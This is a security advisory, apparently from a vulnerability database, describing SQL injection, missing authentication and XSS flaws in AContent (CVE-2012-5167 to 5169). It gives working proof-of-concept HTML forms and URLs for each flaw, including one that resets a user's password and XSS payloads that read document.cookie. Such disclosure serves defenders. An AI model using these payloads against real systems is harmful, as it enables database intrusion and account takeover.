7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.033 Low
EPSS
Percentile
90.3%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.
SQL Injection in AContent: CVE-2012-5167
1.1 The vulnerability exists due to insufficient sanitation of input data in the “field” HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in applications database. The following PoC (Proof of Concept) demonstrates the vulnerability: <form action="http://[host]/course_category/index_inline_editor_submit.php" method="post"> <input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" /> <input type="hidden" name="value" value="1" /> <input type="submit" id="btn"> </form> 1.2 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application
s database.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action=“http://[host]/user/index_inline_editor_submit.php” method=“post”>
<input type=“hidden” name=“field” value=“password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1” />
<input type=“hidden” name=“value” value=“1” />
<input type=“submit” id=“btn”>
</form>
1.3 Input passed via the “id” GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action=“http://[host]/user/user_password.php?id=1’ AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20–%20” method=“post”>
<input type=“hidden” name=“submit” value=“1” />
<input type=“submit” id=“btn”>
</form>
Successful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.
Improper Authentication in AContent: CVE-2012-5168
2.1 The vulnerability exists due to absent authentication in the “/user/index_inline_editor_submit.php” script. A remote unauthorized attacker can change users’ passwords.
The following example will change password for user with id=1 to ‘password’.
<form action=“http://[host]/user/index_inline_editor_submit.php” method=“post”>
<input type=“hidden” name=“field” value=“password-1” />
<input type=“hidden” name=“value” value=“5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8” />
<input type=“submit” id=“btn”>
</form>
2.2 The vulnerability exists due to absent authentication in the “/course_category/index_inline_editor_submit.php” script. A remote unauthorized attacker can modify names for existing categories.
The following example will change category name with id=1 to ‘new_category’:
<form action=“http://[host]/course_category/index_inline_editor_submit.php” method=“post”>
<input type=“hidden” name=“field” value=“category_name-1” />
<input type=“hidden” name=“value” value=“new_category” />
<input type=“submit” id=“btn”>
</form>
Cross-Site Scripting (XSS) in AContent: CVE-2012-5169
Input passed via the HTTP GET parameters “pathext”, “popup”, “framed”, and “file” to /file_manager/preview_top.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of an affected website.
The following PoCs (Proof of Concept) demonstrate the vulnerabilities:
http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28 document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E